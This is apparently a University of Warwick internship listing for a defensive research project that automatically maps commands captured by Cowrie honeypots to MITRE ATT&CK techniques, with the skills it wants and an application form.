Skip to main content Skip to navigation

Internship Programmes

Automating Attack Techniques to the MITRE ATT&CK Framework

Research Group Activity

In recent years threat intelligence frameworks such as MITRE ATT&CK have provided a common lexicon for the cybersecurity industry. Furthermore, they have allowed the tactics and techniques employed by malicious parties and attackers to be classified and profiled effectively. However, profiling attackers and their techniques using the framework takes time due to the amount of data that needs to be sorted and inspected. Conversely, the intelligence gained from undertaking such an endeavour can prove to be invaluable to organizations in the context of how to counter and respond to the threats they face. On the other hand, honeypots have long provided a means by which to observe and monitor attackers. However, without manual intervention, the identification and analysis of behaviours and techniques that could be potentially harvested from malicious parties/attacker interactions would go unscrutinised. A means of automation would reduce the huge amounts of time it would take an analyst to wade through captured data and provide effective and effectual threat intelligence, especially when coupled with a knowledge base of adversarial techniques such as MITRE ATT&CK. The ability to automatically scrutinise attacker behaviours and techniques to the common lexicon of the MITRE ATT&CK framework could potentially provide organizations with a means to mitigate the vast amounts of resources needed to conduct threat intelligence.

Project Description

The project aims to address the following question: "Can honeypots be automated in a manner that allows for commands executed inside them to be automatically detected and attributed correctly to the MITRE ATT&CK Framework".
The project will involve developing a framework/further developing existing mechanisms in which to automate analysis of captured honeypot data so that they can be fingerprinted and mapped correctly to the MITRE ATT&CK framework. Additionally, establishing/assessing the accuracy of the collected fingerprints against the MITRE ATT&CK techniques.

Required Skills

Understanding of MITRE ATT&CK framework is desirable but not essential.
Experience in deploying and maintaining honeypots (Cowrie) is desirable but not essential.
Experience of using docker is desirable but not essential.
Experience of coding in python and implementing the YARA python library is desirable but not essential.

Apply for this Project

If you wish to apply for this project, fill in the form below including uploading your CV and personal statement, explaining why you want to do this particular internship project. Attachments must be in PDF format.

Attach file
No files are currently attached.
Privacy notice
The data on this form will be used as part of your application. The date and time of your application, and your identity (where submitted) will also be stored, but will not be used for any purpose other than administering this application.

The University of Warwick is the Data Controller of any information you have entered on this form and is committed to protecting the rights of individuals in line with Data Protection Legislation. The University's Data Protection webpages provide further information on your rights and how the University processes personal data. If you wish to submit a data subjects rights request, make a complaint or report a suspected personal data breach, please contact the University’s Data Protection Officer by email at infocompliance@warwick.ac.uk.

Spam prevention

Failure to load reCAPTCHA

reCAPTCHA is a utility used to verify you're not a robot filling out this form. Unfortunately this has failed to load correctly.

Please try reloading the page. If the problem persists, or if you are in a country which blocks Google products, please contact us by using the ‘page contact’ link at the foot of this page.

Project Team

Amila Perera

Amila Perera

Gavin Prue